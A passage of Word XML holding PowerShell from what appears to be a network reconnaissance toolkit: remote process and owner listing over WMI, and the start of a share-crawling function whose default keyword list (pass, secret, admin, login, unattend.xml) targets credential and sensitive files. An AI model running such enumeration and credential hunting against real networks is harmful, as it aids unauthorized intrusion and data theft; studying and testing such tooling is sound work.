    <w:p w14:paraId="06241A68" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MountedDrive | Add-Member Noteproperty 'RemotePath' $RemotePath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3215B663" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MountedDrive | Add-Member Noteproperty 'DriveUserName' $DriveUserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602CD0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MountedDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34816ACD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EB16B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD30E98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E3CC30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D27A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Error: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E86FFD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C10E013" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E710901" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71732581" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6972C444" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Warning "Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E04F06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22448FB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A471B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B96B8AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50373423" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-NetProcess {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D80F82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD7E48A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146754C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B2C3D8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Gets a list of processes/owners on a remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B41E2E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39A97C00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3606D08F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E7BDF82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The hostname to query processes. Defaults to the local host name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313A44BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="236BB737" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7660876D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7038679E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object for the remote connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEBFE87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E904AB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E7DB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75796A15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetProcess -ComputerName WINDOWS1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE7A5F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD696D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the current processes for WINDOWS1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2564E8EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B48C8DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="224E3D98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9DC75D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F5F7C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F6196" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF9EAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E36E49A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AECEA05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = [System.Net.Dns]::GetHostName(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDAA83D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="487537FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F1498F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9FE7AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138824A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68F1F839" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # extract the computer name from whatever object was passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CC8457" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Computer = $ComputerName | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FDCB15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7064B76C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD9F6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B39CF5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Processes = Get-WMIobject -Class Win32_process -ComputerName $ComputerName -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D540E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47270221" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8998A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Processes = Get-WMIobject -Class Win32_process -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB1673A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D1F6E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78F91BA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Processes | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A60666" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Owner = $_.getowner();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075023F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Process = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287F8076" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Process | Add-Member Noteproperty 'ComputerName' $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6FF347" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Process | Add-Member Noteproperty 'ProcessName' $_.ProcessName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D4BE69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Process | Add-Member Noteproperty 'ProcessID' $_.ProcessID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6799B741" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            $Process | Add-Member Noteproperty 'Domain' $Owner.Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F183526" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Process | Add-Member Noteproperty 'User' $Owner.User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBBA1F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Process                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F403154" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB145C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CD8F53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74001BF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "[!] Error enumerating remote processes on $Computer, access likely denied: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D06FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17418C99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB9303" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F03B43A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C26029E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Find-InterestingFile {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493F304E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182CF010" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F02537B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67495BF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function recursively searches a given UNC path for files with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0459FB1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        specific keywords in the name (default of pass, sensitive, secret, admin,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0315A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        login and unattend*.xml). The output can be piped out to a csv with the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1061544C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        -OutFile flag. By default, hidden files/folders are included in search results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EBB1CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D10657A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2911E405" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E656C02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        UNC/local path to recursively search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED5A8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="43B79430" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Terms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BCBB6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="076EEABD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Terms to search for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453019AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61559A1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER OfficeDocs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0691C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13130BBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB5E49E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="49105984" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER FreshEXEs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1346E7CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2237B549" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Find .EXEs accessed within the last week.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E327721" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0110FD04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER LastAccessTime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C735A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C613DA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Only return files with a LastAccessTime greater than this date value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0986FEAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1AE5069A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER LastWriteTime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B001E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75805776" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Only return files with a LastWriteTime greater than this date value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A83E88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C73BA33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER CreationTime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB2BB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D88E89D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Only return files with a CreationTime greater than this date value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6850C6C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7DE65771" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ExcludeFolders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B58F21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="384088E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Exclude folders from the search results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECFF9CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2BAF140D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ExcludeHidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A103BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A19AC1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Exclude hidden files and folders from the search results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EC22B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2EFC5B9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER CheckWriteAccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2253520E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="717FA984" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Switch. Only returns files the current user has write access to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49972344" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4630BA59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER OutFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5669CF95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="344D6C82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Output results to a specified csv output file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194887DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E907AC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C21FAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4D45CFFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Mount target remote path with temporary PSDrives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A491A32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="317E9840" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .OUTPUTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A3AFE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02A03D43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The full path, owner, lastaccess time, lastwrite time, and size for each found file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585AEEFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="338F0381" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
